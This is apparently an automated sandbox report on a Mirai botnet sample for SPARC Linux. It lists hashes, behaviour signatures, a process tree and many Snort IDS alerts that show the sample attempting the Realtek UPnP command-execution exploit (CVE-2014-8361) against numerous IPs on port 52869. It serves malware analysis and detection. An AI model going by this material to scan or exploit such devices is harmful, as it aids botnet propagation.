Loading ...

Play interactive tourEdit tour

Linux Analysis Report zJk9UEOnQ7

Overview

General Information

Sample Name:zJk9UEOnQ7
Analysis ID:513323
MD5:309bf4c5ed21406e7014eb818dc1788f
SHA1:a22d7169e00733c6de7a3ba69e8d05a38b635f13
SHA256:040224bd9ea2a0069c349f9a514c3ccd977307f217516ecac9266897c1e6641d
Tags:32elfmiraisparc
Infos:

Detection

Mirai
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Uses known network protocols on non-standard ports
Connects to many ports of the same IP (likely port scanning)
Sample has stripped symbol table
HTTP GET or POST without a user agent
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Sample listens on a socket
Sample tries to kill a process (SIGKILL)

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:513323
Start date:02.11.2021
Start time:02:34:42
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 23s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:zJk9UEOnQ7
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal72.troj.lin@0/3@0/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: http://127.0.0.1:52869/wanipcn.xml

Process Tree

  • system is lnxubuntu20
  • dash New Fork (PID: 5205, Parent: 4331)
  • cat (PID: 5205, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.91tEJtbEWc
  • dash New Fork (PID: 5206, Parent: 4331)
  • head (PID: 5206, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5207, Parent: 4331)
  • tr (PID: 5207, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5208, Parent: 4331)
  • cut (PID: 5208, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5209, Parent: 4331)
  • cat (PID: 5209, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.91tEJtbEWc
  • dash New Fork (PID: 5210, Parent: 4331)
  • head (PID: 5210, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5211, Parent: 4331)
  • tr (PID: 5211, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5212, Parent: 4331)
  • cut (PID: 5212, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5213, Parent: 4331)
  • rm (PID: 5213, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.91tEJtbEWc /tmp/tmp.Zus0sicMvy /tmp/tmp.qH6x8mL5YT
  • systemd New Fork (PID: 5279, Parent: 1)
  • sshd (PID: 5279, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5310, Parent: 1)
  • sshd (PID: 5310, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • cleanup

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: zJk9UEOnQ7Virustotal: Detection: 52%Perma Link

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37418 -> 91.214.119.55:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37418 -> 91.214.119.55:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60692 -> 45.84.90.21:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60692 -> 45.84.90.21:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37424 -> 91.214.119.55:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60698 -> 45.84.90.21:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55222 -> 185.218.153.82:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55222 -> 185.218.153.82:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41092 -> 91.78.58.218:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41092 -> 91.78.58.218:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55228 -> 185.218.153.82:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41098 -> 91.78.58.218:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45572 -> 185.91.122.195:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45572 -> 185.91.122.195:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45576 -> 185.91.122.195:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46890 -> 91.237.184.125:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46890 -> 91.237.184.125:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46894 -> 91.237.184.125:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56232 -> 45.248.68.115:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56232 -> 45.248.68.115:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43654 -> 45.248.69.184:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43654 -> 45.248.69.184:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47734 -> 185.182.49.132:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47734 -> 185.182.49.132:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35552 -> 91.233.137.65:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35552 -> 91.233.137.65:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35558 -> 91.233.137.65:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44326 -> 45.127.163.216:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44326 -> 45.127.163.216:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43668 -> 45.248.69.184:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47754 -> 185.182.49.132:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54224 -> 45.41.83.59:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54224 -> 45.41.83.59:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54094 -> 45.195.66.11:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54094 -> 45.195.66.11:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38512 -> 91.77.255.191:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38512 -> 91.77.255.191:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38520 -> 91.77.255.191:52869
    Source: TrafficSnort IDS: 394 ICMP Destination Unreachable Destination Host Unknown 185.49.215.73: -> 192.168.2.23:
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46394 -> 185.245.0.24:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46394 -> 185.245.0.24:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53448 -> 45.115.236.82:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53448 -> 45.115.236.82:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35538 -> 45.41.94.236:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35538 -> 45.41.94.236:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53464 -> 45.115.236.82:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59394 -> 45.120.204.220:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59394 -> 45.120.204.220:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33570 -> 45.153.8.142:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33570 -> 45.153.8.142:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56190 -> 45.33.245.241:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56190 -> 45.33.245.241:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49568 -> 45.42.90.105:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49568 -> 45.42.90.105:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36744 -> 45.250.172.224:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36744 -> 45.250.172.224:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.166.214.174:23 -> 192.168.2.23:40722
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.166.214.174:23 -> 192.168.2.23:40722
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35158 -> 185.182.49.169:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35158 -> 185.182.49.169:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40162 -> 185.242.234.159:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40162 -> 185.242.234.159:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58316 -> 45.41.80.252:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58316 -> 45.41.80.252:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54210 -> 91.78.173.77:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54210 -> 91.78.173.77:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54224 -> 91.78.173.77:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55942 -> 91.200.121.218:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40182 -> 185.242.234.159:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 68.65.150.5:23 -> 192.168.2.23:54218
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 68.65.150.5:23 -> 192.168.2.23:54226
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41252 -> 185.147.56.225:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41252 -> 185.147.56.225:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41258 -> 185.147.56.225:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32934 -> 185.229.200.19:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:32934 -> 185.229.200.19:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43220 -> 185.245.181.214:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43220 -> 185.245.181.214:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32942 -> 185.229.200.19:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43228 -> 185.245.181.214:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58284 -> 185.19.81.83:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58284 -> 185.19.81.83:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58288 -> 185.19.81.83:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35752 -> 185.131.77.68:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35752 -> 185.131.77.68:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35806 -> 185.131.77.68:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37166 -> 45.120.78.61:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37166 -> 45.120.78.61:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50266 -> 185.147.56.197:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50266 -> 185.147.56.197:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50272 -> 185.147.56.197:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42820 -> 91.200.120.85:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37188 -> 45.120.78.61:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39030 -> 45.115.241.40:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39030 -> 45.115.241.40:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39980 -> 45.158.23.59:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39980 -> 45.158.23.59:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 68.65.150.5:23 -> 192.168.2.23:54442
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 68.65.150.5:23 -> 192.168.2.23:54446
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35898 -> 45.41.85.161:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35898 -> 45.41.85.161:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42372 -> 185.235.180.212:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42372 -> 185.235.180.212:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42376 -> 185.235.180.212:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43500 -> 185.235.180.102:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43500 -> 185.235.180.102:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43508 -> 185.235.180.102:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44562 -> 45.127.160.187:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44562 -> 45.127.160.187:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53406 -> 45.248.68.233:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53406 -> 45.248.68.233:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49726 -> 45.120.184.228:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49726 -> 45.120.184.228:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53442 -> 45.248.68.233:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49738 -> 45.120.184.228:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33742 -> 45.122.139.150:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33742 -> 45.122.139.150:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47780 -> 91.77.241.132:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47780 -> 91.77.241.132:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47784 -> 91.77.241.132:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34458 -> 45.126.229.111:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34458 -> 45.126.229.111:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34042 -> 91.77.156.136:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34042 -> 91.77.156.136:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57902 -> 185.242.7.243:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57902 -> 185.242.7.243:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34048 -> 91.77.156.136:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57912 -> 185.242.7.243:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37992 -> 45.195.10.80:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37992 -> 45.195.10.80:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38942 -> 45.42.89.49:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38942 -> 45.42.89.49:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38022 -> 45.195.10.80:52869
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 91.128.219.90: -> 192.168.2.23:
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55744 -> 45.60.186.106:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55744 -> 45.60.186.106:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53916 -> 45.43.235.171:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53916 -> 45.43.235.171:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55750 -> 45.60.186.106:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39740 -> 45.158.23.111:52869
